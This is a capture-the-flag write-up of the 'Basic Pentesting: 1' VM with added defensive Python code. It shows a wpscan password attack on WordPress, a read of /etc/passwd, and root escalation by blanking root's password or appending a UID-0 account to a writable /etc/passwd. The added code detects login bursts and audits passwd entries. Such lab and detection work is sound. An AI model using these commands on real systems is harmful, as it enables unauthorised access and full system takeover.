Last updated: 15 Apr 24 09:28:23 (UTC)
Write-Up Basic-Pentest
Basic-Pentest
By Lawcky 31/12/2023
Introduction
A small boot2root VM.
Difficulty: easy
Additional info:
Name: Basic Pentesting: 1
Release date: 8 Dec 2017
Author: Josiah Pierce
Series: Basic Pentesting
|NOTE| We won't copy all the scan output here as it would be far too voluminous; it is available through the link in the original post.
In this write-up
- nmap
- nikto
- wpscan
Write-UP
Anonymous FTP test
Anonymous login asks for an email address.
Website
The website's default page seems empty.
/secret/
We change the /etc/hosts entry so the site's hostname resolves.
We now have access to the site and know that it is a WordPress install using the twentyseventeen theme.
Attacking WordPress
Getting WordPress access
sudo wpscan --url http://b.pen/secret/wp-login.php --password-attack wp-login -U admin -P common.txt
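The password attack above is noisy on the server side: every guess is a POST to wp-login.php, and WordPress answers a failed login with a 200 page and a successful one with a 302 redirect. As an added example (not part of the original write-up), here is a small Python detector that parses constructed Apache-style access-log lines, flags addresses that POST to wp-login.php in a burst, and reports which of those then received the success redirect. The log lines, the 192.168.56.x addresses, the 60-second window and the threshold of five attempts are all constructed assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined-log-format parser (the sample lines it is run on are constructed below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one ordinary visitor with a single failed login, then a
# burst of POSTs to the login page from a second address, ending in the 302
# that WordPress sends on a successful login. Addresses and times are invented.
SAMPLE_LOG = """\
192.168.56.1 - - [31/Dec/2023:10:14:58 +0000] "GET /secret/ HTTP/1.1" 200 4312
192.168.56.1 - - [31/Dec/2023:10:14:59 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 2871
192.168.56.101 - - [31/Dec/2023:10:15:01 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 2871
192.168.56.101 - - [31/Dec/2023:10:15:02 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 2871
192.168.56.101 - - [31/Dec/2023:10:15:03 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 2871
192.168.56.101 - - [31/Dec/2023:10:15:04 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 2871
192.168.56.101 - - [31/Dec/2023:10:15:05 +0000] "POST /secret/wp-login.php HTTP/1.1" 200 2871
192.168.56.101 - - [31/Dec/2023:10:15:06 +0000] "POST /secret/wp-login.php HTTP/1.1" 302 0
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_login_bursts(lines, window_seconds=60, threshold=5):
    """Return {ip: attempts} for addresses with >= threshold POSTs to wp-login.php
    inside any sliding window of window_seconds."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            by_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in by_ip.items():
        stamps.sort()
        start, best = 0, 0
        for end in range(len(stamps)):
            # Slide the window start forward until it spans at most window_seconds.
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def successful_login_after_burst(lines, flagged):
    """Addresses from `flagged` that got a 302 from wp-login.php, i.e. a guess worked."""
    hits = set()
    for line in lines:
        rec = parse_line(line)
        if (rec and rec["ip"] in flagged and rec["status"] == 302
                and rec["path"].endswith("/wp-login.php")):
            hits.add(rec["ip"])
    return hits


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    bursts = find_login_bursts(lines)
    print("login bursts:", bursts)
    print("bursts followed by a successful login:", successful_login_after_burst(lines, bursts))
```

On the constructed sample the single failed login from 192.168.56.1 stays below the threshold, while 192.168.56.101 is flagged with six attempts and is also reported as having logged in successfully, which is the case worth an immediate password reset rather than just a block.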
RCE using WordPress themes
We now have shell access as the user www-data.
We upgrade to a full TTY shell.
Information gathering
cat /etc/passwd
kernoops:x:116:65534:Kernel Oops Tracking Daemon,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,:/var/lib/usbmux:/bin/false
marlinspike:x:1000:1000:marlinspike,:/home/marlinspike:/bin/bash
mysql:x:121:129:MySQL Server,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
Linux Enumeration
After running linpeas.sh we see several findings; the one that stands out is:
There are two ways of using this. The first is to remove root's password by deleting the x in the line
root:x:0:0:root:/root:/bin/bash
The other way is to create our own user with root privileges:
openssl passwd -1
This prints a hashed password; we put it in place of HASH and append the new entry to /etc/passwd:
echo 'pwn:HASH:0:0:pwned:/root:/bin/bash' >> /etc/passwd
su - pwn
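Both methods above only work because /etc/passwd is writable, and both leave a clear trace in the file itself: an empty password field, a password hash stored directly in /etc/passwd instead of /etc/shadow, or a second account with UID 0. As an added example (not part of the original write-up), here is a Python audit that parses passwd entries in the layout shown above and reports those conditions, plus a permission check for the world-writable bit. The excerpt, the "pwn" entry and its placeholder hash are constructed for the example, and `audit_file` is a hypothetical helper for running the same checks against a real file.

```python
import os
import stat

# Constructed excerpt in the layout the write-up shows, with one extra line of
# the kind the second method would add. The "pwn" line and its hash are
# placeholders, not real data.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
marlinspike:x:1000:1000:marlinspike,:/home/marlinspike:/bin/bash
mysql:x:121:129:MySQL Server,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
pwn:$1$placeholder$notarealhash:0:0:pwned:/root:/bin/bash
"""

# Same layout with root's "x" removed, as in the first method (also constructed).
SAMPLE_PASSWD_NO_X = """\
root::0:0:root:/root:/bin/bash
marlinspike:x:1000:1000:marlinspike,:/home/marlinspike:/bin/bash
"""


def audit_passwd(text):
    """Return a list of (finding, account) tuples for suspicious passwd entries.

    Findings: extra_uid0 (a non-root account with UID 0), empty_password (the
    password field is blank), hash_in_passwd (a hash stored in /etc/passwd
    rather than the usual "x" pointing at /etc/shadow), malformed (wrong field count).
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("malformed", f"line {lineno}"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if not uid.isdigit():
            findings.append(("malformed", name))
            continue
        if int(uid) == 0 and name != "root":
            findings.append(("extra_uid0", name))
        if pw == "":
            findings.append(("empty_password", name))
        elif pw != "x" and not pw.startswith(("!", "*")):
            # "!" and "*" prefixes mark locked accounts; anything else is a hash.
            findings.append(("hash_in_passwd", name))
    return findings


def is_world_writable(mode):
    """True if an st_mode value carries the other-write bit (what makes both methods possible)."""
    return bool(mode & stat.S_IWOTH)


def audit_file(path="/etc/passwd"):
    """Hypothetical helper: run the content checks and the permission check on a real file."""
    with open(path) as f:
        findings = audit_passwd(f.read())
    if is_world_writable(os.stat(path).st_mode):
        findings.append(("world_writable", path))
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) + audit_passwd(SAMPLE_PASSWD_NO_X):
        print(finding)
```

The legitimate entries from the write-up produce no findings; only the added "pwn" line (two findings: extra UID 0 and a hash in /etc/passwd) and the root line with its x removed (empty password) are reported. A periodic run of `audit_file()` together with a file-integrity check on /etc/passwd and /etc/shadow catches both methods shortly after they are used.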